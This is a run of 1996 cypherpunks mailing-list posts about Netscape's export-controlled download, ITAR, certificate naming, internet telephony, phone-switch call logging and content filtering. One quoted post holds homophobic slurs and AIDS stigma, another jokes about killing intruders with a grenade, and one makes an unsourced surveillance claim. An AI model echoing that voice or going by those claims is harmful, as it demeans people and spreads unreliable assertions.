> Also, I got onto their system within a half hour of spotting the
> announcement sitting in my cypherpunks.spool file and had no trouble
> downloading even though it wouldn't let me into the site with Lynx.
> I'd say they gave this list preferential, timely treatment ...

Three cheers for Netscape!
-- Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 20 Jul 1996 19:43:04 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607181704.MAA16235@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960719015510.1133G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, Igor Chudov @ home wrote:
> Timothy C. May wrote:
> > As people as diverse as Marine Colonel Jeff Cooper and Watergate felon G.
> > civilians), .45 ACP +P does a pretty good job. Certain +P .357 Magnum
> > rounds are even better penetrators, but recoil and muzzle blast is pretty
> > severe with these loads.)
> Then I also suggest that you install a metal door and put metal cages on
> your windows.  That will at least give you some time to wake up if
> someone tries to break into your house. Also get a good dog.
> Without that, having a gun will not do you much good. It will be more
> trouble than itis worth because you cannot understand the situation
> quickly enough after you wake up, so you may kill someone peaceful who
> entered your home with good intentions, which will get you in jail.  If
> you had a metal door, you would have enough time to wake up and assess
> the situation.

     While most of what you say about preventing someone from braking in to 
your house has a great deal of merit, I strongly challenge the idea that 
anyone coming thru a locked door or window at 4 in the morning has "peaceful 
intentions". Prudence indicates that you treat such individuals as hostiles 
until otherwise proven.

     In otherwords: Bullshit, anyone coming thru a window at 4am is either 
a hostile, or you are doing society a favor by removing that person from 
the gene pool.


     I may be a little nuts, but does it strike anyone else that a good 
self defense weapon against ninja raids would be a hand gernade? 

    Seriously, hang it by your bed, and when they break in, grab it. If
they shoot, they die. You are probably already dead. If they don't shoot,
put the pin back in and continue on about your business. A bit of overkill
maybe, but you don't really need to aim all that well.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 00:08:32 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
In-Reply-To: <ae13cb6c140210047abf@[205.199.118.202]>
Message-ID: <v03007602ae14fa401e3f@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM -0700 7/18/96, Timothy C. May wrote:

>This is a terribly important point: if a citizen of Foobaria succeeds in
>connecting to the Netscape site--perhaps by experimenting with various
>combinations of domain names and submitted address/zipcode
>combinations--and Netscape sends him the file, he has not committed a crime
>in his own country. (Unless they have their own laws....)

Incorrect. Netscape Navigator is as much commercial software as Microsoft
Word, It is NOT freeware and if he pirates it without permission he's at
least in violation of copyright which almost every country is a signatory
to. Where I come from we call that "theft". Your ethics may vary in
California.

>
>Likewise, much "export-controlled" software is freely purchasable without
>any form of identification or proof of citizenship/residency in any of
>thousands of U.S. software stores.

True, but you have to agree to the licensing warning on the box (and let's
not do the tired shrink-wrap licensing argument again, please--it's on the
outside of the box).

> (I don't know if the copies of Netscape
>Navigator on the shelves in U.S. stores are now the "U.S." version,

Yes.

> as
>opposed to be a somwhat-crippled version, but I sure do know that a *lot*
>of nominally-export-controlled software _is_ freely purchasable.)

That no more gives you the legal right to violate ITAR after purchasing, or
violate the license terms, than buying fertilizer gives you the legal right
to make bombs in violation of the AT&F code. (No wise-guy complaints about
how software isn't a bomb--though some I've bought clearly is :-). It's an
analogy about principles, not function.)

>
>Much of this software goes out of the country in luggage. In my various
>flights out of the U.S. over the years, never have my bags been so much as
>glanced at, except presumably for bombs with sniffers, scanners, etc.
>Further, I have mailed optical disks out of the country--a single one of
>these can store a whole lot of stuff.

I didn't say you couldn't do it. In fact I said the opposite--that I had no
doubt it would leak. My point was that it wouldn't become mass-market
software overseas because the leakers would be violating ITAR or copyright,
or licensing and thus couldn't get away with selling or giving away the
result at scale overseas. As Jeff pointed out, getting a licensed copy of
Navigator does NOT include redistribution rights (unless you buy a site
license directly from them--and they won't sell a site license for the US
version for overseas use in violation of ITAR). In this respect it is
significantly different from PGP or RSAREF. for which there ARE at least
some redistribution rights under the license.

>On a trip to France and Monaco last year, I deliberately carried several
>optical cartridges and couple of DATs, all crammed with  software, PGP,
>RSADSI's MailSafe, Mathematica, etc. To make a point, and as props for my
>talk on crypto anarchy. Certainly there was no checking on the way out at
>SFO, and no checking whatsoever at Charles de Gaulle in Paris.

"Nyaah, nyaah, you can't catch me" doesn't mean that if they do they won't
prosecute. Your waving around that stuff in France is not only juvenile,
but also may put you in violation of French crypto law. That you can get
away with 80 in a 55 mile zone until the cops see you doesn't mean 80 is
legal nor that everyone else can do it with impunity.

>
>(On my return trip, the bored inspector in San Francisco asked what my
>purpose in being overseas has been. Had I said "tourism" I would've been
>waved through. Instead, for interest, I said "Meeting with Russian
>cryptographers in Monte Carlo," just to see what would happen. He asked me
>what "cryptographers" are or do... "They make secret codes." He then waved
>me through. Sigh.)

There's no law against meeting, and customs inspectors aren't expected to
launch interrogations to see what you told them if you're not on some watch
list. Like many laws, this one might be used if something egregious
happens. If the Russian got caught later with US Netscape by French
authorities, and it came to the attention of US authorities that he said
"Tim May gave it to me", THEN you might expect to "assist the police with
their enquiries".

>
>None of this is surprising, of course. Borders _are_ transparent. There are
>so _many_ degrees of freedom for getting stuff across borders. The hope
>that a bunch of *bits* can be stopped in ludicrous.

Again you make the long-discredited straw man argument that the purpose of
ITAR is to hermetically seal. It is not. It is to keep legitimate US mass
market purveyors from selling strong crypto overseas, and to provide a
means to punish those who are caught violating it.

I'm sure there are lots of tax cheaters. That doesn't mean the IRS code
should be abolished (though I'd like to see massive simplification for
other reasons). I'm sure there are still thieves. That doesn't mean we
should make theft legal. I'm sure there are still those who cannot read.
That doesn't mean teaching reading is useless or silly or should be stopped.

>
>_This_ is why I expect the Netscape beta to arrive overseas pretty soon.

Nobody disputes that. It won't be readily available though, except for
those who have no compunctions about software piracy.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 20 Jul 1996 19:25:07 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: ABC News on internet telephony
In-Reply-To: <v03007606ae142ab45e4b@[192.187.162.15]>
Message-ID: <Pine.LNX.3.93.960719021127.1133H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, David Sternlight wrote:

> At 6:41 AM -0700 7/18/96, Clay Olbon II wrote:
> >There was a pretty long piece on the evening news on using the internet for
> This is the rankest speculation on my part, but could some of the bigger,
> smarter phone company cum internet providers have done some serious
> analysis and concluded that we're moving away from distance-based rates for
> voice calls. Might they even have examined where we'll be in the next ten
> years (with ADSL, etc.) and decided that the network technology and simple
> market economics makes fixed charges per "line" more profitable to them
> than metered usage? Maybe this is wishful thinking on my part, but some of
> the bigger actors are starting to behave in a surprisingly
> counter-intuitive (based on the way we stereotype them) fashion on this
> topic.

     It is my understanding that billing is one of the biggest headaches
and expenses for a phone company. Going to a flat rate would solve a 
decent amount of that wouldn't it?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 20:57:04 +0800
To: Carl Ellison <froomkin@law.miami.edu>
Subject: Re: Reasonable validation of a software package
In-Reply-To: <199607170728.AAA29471@comsec.com>
Message-ID: <v03007604ae1507913f38@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:12 PM -0700 7/18/96, Carl Ellison wrote:

>
>The problem people overlook is that a CA binds a public key to a name but
>the name is in the CA's name space.  For me, a verifier, to derive any
>value from a certificate binding (key,name), the name has to be in *my*
>name space.
>
>If there were such a thing as a global namespace meaningful to everyone,
>then we could both use it.  That's the X.500 falacy/pipe-dream.

Think of the common name on a certificate as if it were a first-come,
first-served serial number of alphanumeric form. There's no reason to
believe that John Smith is YOUR John Smith. Your John Smith might tell you
he's John Smith 37. It's kinda like vanity license plates.

The alternative is every privacy fan's nightmare--embedded SSNs or some
such in certificates.

Some of the problems, of course, will be of the users' own making and there
they get to pay their money and take their choice. What I mean is that you
can optionally include or suppress your e-mail address in Type I
certificates, and real address in Type IIs. If you include it you improve
the chances of being the "right" John Smith someone is after. If you prefer
privacy you will also be less accessible. I see nothing unusual about
that--after all, people with unlisted phone numbers are ultimately
inaccessible except (pretty much) to those to whom they give the info.

>
>The fact is, no global name space could be held in one human's mind, so
>there's no way a global name space could be meaningful to me.

Nor is there any reason it should be. It isn't, now.

>
>So, to use a certificate from a CA, I need to map a name from its name
>space (DN) into a name in my name space (nickname).  Every time I've looked
>at that process, I've had to have a secure channel over which to learn from
>the person I call by that nickname what DN he goes by.

Why does it have to be a secure channel? Why can't it be published (for
instance by including the address in the certificate)?

>If I have that
>secure channel, then he could tell me his public key fingerprint ove that
>cnnel -- and I wouldn't need the CA.

Why wouldn't you use the certificate to bind the public key to the name and
address? What need would there be for fingerprint communication?

How is this different from 20 John Smiths in the phone book at 20 different
street addresses? I'd better know the address of the John Smith I want if
I'm to get his phone number from a directory.

Note that I'm not attacking what you say. There's clearly something you're
getting at that I don't understand--since you post sensible stuff (as far
as I recall). Help me out here.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 21:26:07 +0800
To: cypherpunks@toad.com
Subject: RE: ABC news on Internet Telephony
In-Reply-To: <199607182054.NAA04198@well.com>
Message-ID: <v03007603ae15017fd230@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:54 PM -0700 7/18/96, talon57@well.com wrote:
>David Sternlight writes:
>
>>There's something fundamental going on here beneath the surface.
>>Surprisingly, a recent item (maybe the one you reported) on this
>>suggests that the big phone companies are trying to use this
>>phenomenon rather than stop it. I think it was AT&T who announced
>>that they had web software that improved the quality of such
>>internet voice calls. Surprisingly constructive, in contrast to
>>the coalition of small phone companies screaming for the FCC to
>>"stop it". The FCC has wisely said they're not going to act right
>>now because it could kill an incipient new technology.
>
>There is something fundamental going on here, a lack of common
>sense, and/or critical reasoning.

Starting off with defamation is a sure tipoff that what follows is crap.
And sure enough...

>
>Lets try it again. Who is the most likely to be disintermediated by
>a global packet network? (how do you get to your ISP?)
>
>I assume by "big phone company" vs "little phone company" you are
>refering to long distance vs local service, tell me, if the RBOC's
>continue merging, at what level do they become a " big phone
>company."

No. I'm referring to the consortium of small phone companies that asked the
FCC to stop it, in contrast to big phone companies which explicitly refused
to join in that request. The big ones were both long-distance carriers and
big local ones (a distinction that will soon disappear).

>
> The RBOC's are not the only local service providers of course,
>here in Illinois alone there are more than 80 (at my last count)
>providers of local service, and soon there will be many more.

And...?

>
>The other "urban myth" you are helping to support is the notion
>that it is the local providers that are fighting deregulation.
>Ameritech filed for total unbundling in March of '93, and you don't
>see them insisting on having a percentage of the long distance
>market before the long distance companies are allowed to compete in
>the local loop.

I'm doing no such thing. I'm reporting the empirical data. Have you some
problem with facts?

>
>ADSL is an interesting attempt at digital telephony but expensive
>and basically would mean replacing existing central office
>switches. (backbone bandwidth)

I'm not sure this is accurate. The ADSL modems are already down to the
price of v.34s at the start of v.34 and ADSL is still in its initial stage.
Being able to sell 6 MEGAbyte/sec bandwidth over ordinary copper phone pair
will increase telco revenues substantially with little additional cost
except at the switch. Switch mods don't require replacement and their cost
per dollar of revenue (even if they give away 6Mb bandwidth at ISDN prices
for 128Kb bandwidth) is pretty low. They could even charge what the cable
guys do for basic service (using video dial tone), add current charges for
local phone service, include a free Internet connection, and make money. In
fact, PacBell stopped wiring California for fiber and simply buried
incomplete cable in most locations last year because ADSL is so much better
a deal, infrastructure cost-wise. If you haven't already done so you should
check out the web sites for the ADSL consortium.

>
>In a packet network you have to either dedicate a portion of the
>bandwidth for a synchronous circuit, or you have to have a very
>fast network and use very small packets (ATM), expensive either
>way.

ATM is going bye-bye according to the trade press. It IS too expensive. As
for the synchronous circuit, if you're talking a signalling path that's
provided for and takes a tiny part of the bandwidth. At the switch it won't
look any different than today's call routing.

>
>A single central office has many times the bandwidth of the widest
>part of the internet, and the average state has hundreds of CO's.
>If even a small portion of the Internets current users tried
>placing a call things would grind to a halt. A huge increase in the
>number of backbones and their bandwidth would solve this, but who
>will pay the bill?

Now we're back on topic. Dunno how the increased bandwidth will be paid for
if lots of people start doing internet phone. Perhaps a new pricing model
with metered, but not distance-sensitive rates. Perhaps a special charge
for voice packets. Perhaps the number of subscribers attracted by cheap
phone will be enough to pay for the bandwidth under current pricing models.
Perhaps the split between the ISPs and the backbones will have to change.
Love will find a way.

>
>TANSTAAFL

Last time I looked my ISP was charging me about $20 a month--hardly "free".
And business users pay more.

>
>Sometime ago the discussion was on the cost of laying new fiber,
>may I suggest  the realworld heuristic of "a million dollars a
>mile."

Naah. The existing bandwidth that would go dark if phone calls shifted to
the net would become available. And I understand there's a huge amount of
dark fiber already in existence. I don't think this is the scarce resource.
I'ts starting to look like you're attempting proof by assertion rather than
referring to the known data.

>
>Please note I am not trying to make fun of anyone personnally, I am
>in the words of Jubal Harshaw "heaping scorn upon an inexcuseably
>silly idea, a practice I shall always follow."

I will refrain from heaping scorn on what appears to be a wild set of
ill-thought-through and uninformed objections. Your better-informed
colleagues will do it for me. If it's any comfort, I thought exactly as you
do until I started to read the discussions of this topic by experts.

(By the way there's a lot of material on Internet Phone on AT&T's web site.)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 20 Jul 1996 00:07:15 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <2.2.32.19960719095559.00692920@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
>being spewed constantly. I filter lots of items. I read "Scientific
>American" and "The Economist" because they filter (or "censor," in the
>sense some are objecting to here) nonsense about "queer rights" and
>"peircing fashions," to name but a few things I have no interest in hearing
>about.

Choosing what you read and choosing what other people (including your
children) read is the difference between filtering and censoring. I didn't
say filtering was wrong,  I said censorship was wrong.

>If I had kids, I'd make sure that lots of negative memes were kept away
>from them until they reached an age where it no longer mattered, where
>there views are already basically set.

I am sorry to hear.  I think we underestimate childrens' ability to decide
for themselves what is right and wrong, and I think the seemingly inate 
desire for parents to want children that are all but clones of themselves
is especially dangerous and certainly harmful. I think that restricting access
to "negative memes" from anyone (including children) actually does more
harm than good.  I didn't particularly want to get into this, so I will
leave it up to you to read John Stuart Mill's "On Liberty" for very strong
arguements in my support.

>I see nothing wrong in this. Anyone who disagrees is, of course, free to
>set his filters differently, but not to insist that my filters be changed.

I absolutely agree.  Unfortunately, the filtering programs we were discussing
allow a user very little, if any, ability to "set his filters differently".  

>And the government is not free to pass any laws about what filter sites can
>and can't do.

Again, I agree, and thought I had made that clear.  However, that doesn't mean
we can't object on a social (opposed to governmental) level.  I repeat: just
because a government doesn't have the right to oppose private censorship doesn't
make it OK.

>Unfortunately, I think many on this list are so taken by "liberalistic"
>notions that they think the State needs to intervene to stop me from
>filtering my son's access to "The Joys of Queer Sex."

I was under the impression that most on the list were avowed libertarians,
and would rather the State didn't intervene in any part of your (or your
son's) life.  However, I would still argue that restricting your son's
access is more of a detriment to your son than allowing it, then discussing
why it is Wrong (or whatever) and why he feels it is necessary to read such 
things.  I would also argue that you are right in that the State has no 
right to force you to raise your child in any way.  But, as I stated in 
another post, the problem is not just the government.

>Some parents simply get tired of spending time each night trying to undo
>the propaganda taught in many public school, such as books like "I Have Two
>Mommies." Many of these parents eventually give up and put their kids in
>religious or private schools (even though they continue to pay taxes for
>schools their own children are no longer using).

I fail to see how trying to breed attitudes that you allegedly avow is
"propaganda".  The book you cited is intended as a means of teaching 
acceptance, not necessarily approval.  You say you tolerate homosexuals,
but that is not a wide-spread practice yet.  Violence and ridicule is the
more common response to openly homosexual behaviour, and that book is meant
to stop such bigoted reactions.  You'll note that nowhere in the book does 
it say anyone *should* be homosexual, it merely says that it's okay if you 
are and you should accept others who are.

>Queers are, as far as I'm concerned, perfectly free to practice their
>AIDS-spreading practices to any and all receptive anuses they can find, but
>I eschew this lifestyle and will fight to the death for this right to avoid
>their practices from being forced on me or my children (if I had any, which
>I don't).

Please show me an instance where you or your children (if you had any) would
have been forced into practicing homosexuality by anything taught in a public
school or shown on a web page.  Exposure to a lifestyle and having that life-
style's practices forced on you are not the same.  Would you allow your 
children to learn about Nazi Germany?  I find the lifestyle of the Nazi
positively disgusting, but wouldn't think to prevent my child from learning
about it.  Same thing with other cultures, religions, political principles,
etc.  The simple fact that this particular issue is regarding sexuality bears
no significance to the arguement.  A child (or any other person) should not
be restricted access to any sort of information available about any topic,
unless she is restricting her own access (filtering).

<garbage regarding AIDS/etc ignored>

//cerridwyn//







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 20:53:22 +0800
To: cypherpunks@toad.com
Subject: Re: MSNBC and cookies
Message-ID: <2.2.32.19960719100042.006a150c@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Microsoft and GE, the parent corporation of NBC, are participants in the
>FBI's "Web Awareness Program." Like the FBI's "Library Awareness Program,"
>which tracked which books were being checked out by which patrons, the Web
>Awareness Program tracks user interests at Web sites.
>
>The WAP has already allowed the FBI and other intelligence agencies to
>check up on several people who appeared to have an unusual interest in the
>TWA 800 case.
>
>(Don't spend too much time in certain sites, friends.)

This is interesting.  Where can one find reliable sources to verify this
information?  (The existance of a WAP, and the use of it in the TWA 800
case).   //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jul 1996 00:25:09 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: overseas PGPfone and Netscape
In-Reply-To: <01BB74A5.CDC6BC00@JPKroepfli.S-IP.EUnet.fr>
Message-ID: <31EF6237.180D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> I haven't tried to download it myself, yet (I'm on the wrong side of a
> slow link <plug>(though it's faster since I got my new ZyXEL
> yesterday)</plug>), so maybe this is explained for me, but does netscape
> publish checksums for their US binaries?
> 
> This isn't just an issue of making sure your copy wasn't munged in transit;
> without checksums, what's stopping netscape from embedding the info you
> provide in the binary before shipping it to you, so that if it shows
> up on hacktic, they know who did it?
> 
> Could various people with various architectures post MD5 or SHA1 hashes
> of the files they downloaded?

  I'm sorry, but I don't have time to run the checksums right now.
Feel free to compare checksums of downloaded files.  You won't find
any secret tagging.  Note also that the download is via SSL.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jul 1996 00:21:41 +0800
To: roy@scytale.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <31EF632D.2B88@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Roy M. Silvernail wrote:
> Their file delivery CGI could use some work... no reason I can see to
> offer the filename 'pick.cgi' for everything.

  We will be fixing this problem soon.

> Anyone sniffing the link
> knows the filename from previous forms submissions, anyway.

  You can't sniff the link, since the form submission and the
file download are via SSL.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 19 Jul 1996 19:56:38 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <ae143914000210044473@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960719044205.16543D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, Timothy C. May wrote:
> Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
> being spewed constantly. I filter lots of items. I read "Scientific
> American" and "The Economist" because they filter (or "censor," in the
> sense some are objecting to here) nonsense about "queer rights" and

Actually, the Economist has, er,  come out strongly in favour of gay 
rights on numerous occasions- most recently on the issue of same sex 
marriages. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 21 Jul 1996 07:34:59 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607161754.KAA25543@netcom18.netcom.com>
Message-ID: <Pine.LNX.3.94.960719051854.2531A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Vladimir Z. Nuri wrote:

> Date: Tue, 16 Jul 96 10:54:28 -0700
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>
> To: David Sternlight <david@sternlight.com>
> Cc: cypherpunks@toad.com, vznuri@netcom.com
> Subject: Re: Sternlight on C'punks 
> 
> 
> >And another thing. The reason I've not joined this group earlier had
> >nothing to do with "worthy". It was because after discussion a year or so
> >ago, Tim May suggested to me via e-mail that it would just generate a lot
> >of controversy, at a time when people were so polarized that they couldn't
> >hear each other and thus my presence here would serve no useful purpose.  I
> >took Tim's advice and stayed out.
> >
> 
> frankly I think a mailing list that can't tolerate informed
> but  dissenting views such as your own without self-destructing has
> an inherent problem that exists independent of your participation.
> perhaps it is a valuable public service to expose such a flaw. at
> least, that's the hacker spirit. as for TCM recommending you not
> join, I'm disappointed to hear anyone so ostensibly and vocally
> committed to free speech would tell anyone that their presence
> would be "disruptive" or "controversial" and recommend against it.
> 

I'm enclined to agree with you.  It is a bit embarasing for people on one
of the newsgroups that encourages free speach like this one does to ask
someone, basicly, not to speak because they don't agree with our
oppinions.  Personally, I'd like to welcome David to the list.  I'm sure
we need some, well.. out of lack of a better word,  opposing, views. So
far I've seen more flaimbaiting _AT_ him on this list than _BY_ him.

>
> >I thought that by now the more extreme dogmatists among you would have
> >matured, especially given the evidence generated by the real world about
> >how things are and are going if nothing rational and effective is done to
> >stop it. Some of you have met me at Crypto and found I'm not the devil
> >incarnate. Some of you know that we share many (but not all) policy views
> >in common.
> 
> well, I find you to have mellowed yourself after a legendary amount
> of back and forth in cyberspace, although I would still consider
> some of your own views "dogmatic" as you term it.
> 
> >
> >The presenting symptom for my joining now was a copy of a post by an MIT
> >professor I respect to this group, which a colleague sent me. Perhaps I was
> >too hasty in my belief that we can begin to hear each other.
> 
> I personally find your GAK positions superior to those of the
> administration, at least, although that's almost the lowest-common
> denominator litmus test for not starting massive flamewars on the 
> list.
> 
> a suggestion: get a pseudonym! if you only care about debate, you
>

That is a little bit of the "I'm afraid of your oppinion" approach, isn't
it?  Then his pseudonym would probably just wind up with the same
reputation, and people would start comparing him to himself.  Thats more
likely to make a mess thant to solve anything.  He has his views, I have
mine, you have yours.  Learn to live with it.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMe8cYTAJap8fyDMVAQHvrAf/R/YLvNiISulJ+VnNFxKdusmTnnTHMBG3
V5G4HBAZJ7CamOtfeHPmVZH+QtANZBt8//n4B1eW67sNLhoksQp4GRBUgVotBNsS
g3PRNhkG7cIYTN1GOki6hImjvix7NTWG3KpgU1cQXfIDjgFi/9bf/bYGchQLVKpP
4WgjvilI3kWPUcXxhqdponRB9ZBLy7XPTgok/HtENSby2h+oRKL9cUZOjFAuthu2
veYlZ2loju5ovojE0yecYUykCpPiTf6x9AXBBtN4wA2YVMV95s3mzZRbYEeRBkYn
WLcOQ1i1Ut0wM5/Bhge0NnjV9wZrykvr21EiGrh/X9wlzp9wrfxoAA==
=Ht1c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 21 Jul 1996 07:39:45 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Metered Phone
In-Reply-To: <1.5.4.32.19960717115720.008caa88@193.246.3.200>
Message-ID: <Pine.LNX.3.94.960719055902.2531B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 17 Jul 1996, Remo Pini wrote:

> Date: Wed, 17 Jul 1996 13:57:20 +0200
> From: Remo Pini <rp@rpini.com>
> To: cypherpunks@toad.com
> Subject: Re: Metered Phone
> 
> At 12:45 AM 7/15/96 -0700, you wrote:
> >At 01:19 PM 7/7/96 +0800, you wrote:
> >>Does anyone have any ideas about this metered phone? 
> >>I am from Philippines and heard some news that it will be 
> >>existing in 1997. Quite a big problem! Every dial will be counted, 
> >>every seconds will be measured...
> >
> >That sounds like you're getting newer telephone technology.
> >In the US, most areas with newer telephone switches offer you
> >the choice of flat rate service (you pay a constant price per month
> >...
> >Bill Stewart
> 
> Well, in Switzerland all telephon-switches (including the ones the company I
> work with manufactures) record:
> 1. start of call
> 2. destination of call
> 3. source of call
> 4. end of call
> 

Well, I know the higher-end NorTel and Lucent switches (ah la the DMS100,
200, 250, the 5ESS and the 1AESS) there are, basicly, 5 catagories... 

911, toll free (800,888,local non-metered), extra charge (900/976), and
metered.

pretty much non-metered is the only one that doesn't do the dest/src
recording (unless you've got a DNR put on your line, which usually means
the USSS/FBI are breathing down your neck.  Had it happen once. definatly
not fun.)

Of course, those switches are all programmable, so you can add more.

> After all, you can get a detailed list of all your calls by the end of the
> month (the phonenumbers of the destination are somewhat obscured -> only the
> first 4 digits).

Only on metered calls (includeing 800/900 type) at most places.

> As soon as you get digital switches (POTS or ISDN) your phonelife is
> measured, stored and statistically evaluated.

But most of the time (ok, most numbers, not most types of numbers) it
keeps track of percentage of calls from this type of line, to this type of
line, not exact info on which lines.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMe8mHDAJap8fyDMVAQG2mwf8C8h860oF7qV84DrsUJFSQxDhx4dGIXQz
6u/e4PF5aYnaPspJcE7cGCY/TMa3/tWiLhPmGhmEtyUyvmFJgHcValbsVw7zZvkd
D1q0sdXtOa9FI3QpN6yqDKkXqCDk9Mq7UR1nbU/biQb53TeL8ypmy73ykRXl8TQd
glSeyhNnOl5EUTbWxG6BUI5bGFxaxuX94MCTOa1LDwPCxDNbWW0K1vehlZsP5lpH
obEHaHN2kYix7JoeCMDdLlyI6c5IdY45SEWakR8wonNnlRJgozGM1hDPhytN93BE
iaZPzMxFVV41MayYtEpsaV1v2WSHoMXRpG3ihUoWE1Hlc6g5JJdJeg==
=bvoR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <paul@mycroft.actrix.gen.nz>
Date: Fri, 19 Jul 1996 07:27:33 +0800
To: cypherpunks@toad.com
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <Pine.GSO.3.93.960718180020.10966B-100000@nebula.online.ee>
Message-ID: <199607181918.HAA04314@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


   else's account. It just seems the reward they are offering me is not
   enough for my work. What might be a good reward for hacking into an
   Internet bank and showing I can steal their money?

Getting to keep the money :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Sat, 20 Jul 1996 02:23:51 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Netscrape download
In-Reply-To: <199607190151.VAA14421@nrk.com>
Message-ID: <199607191425.HAA16887@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



>[From Phil Karn]

>Netscape's use of a CGI interface to download the US version
>(128-bit key) of Netscape Navigator raises the possibility
>that they are "serializing" or "personalizing" each copy they
>send out, perhaps in response to a DoS request that they do so
>in order to trace unauthorized redistribution.

>SunOS version:
>e72ff352ca7c619cb31b8f8ef3651b28

This is the same one I got.  No funny business there.

	Jim Gillogly
	Mersday, 26 Afterlithe S.R. 1996, 14:25




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 00:20:29 +0800
To: cypherpunks@toad.com
Subject: Re: Mail-order Ph.D.'s
In-Reply-To: <199607181618.MAA11826@nrk.com>
Message-ID: <250aRD171w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:
> We will NOW get treated to UnProfessor's SternFUD's entire life history.
>
> How he went & designed the first rockets, then gave the idea to
> Goddard. Then he went to England and invented tea. Next he came
> back & was a personal advisor for Tricky Dick. Later, he discovered
> the oil in Alaska. In the middle he invented the concept of
> money....

He also invented the radio, but Marconi+Popov stole the credit from him.
And he's the founder of public-key cryptography.
Oh - he also invented Ethernet and TCP/IP.

:-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
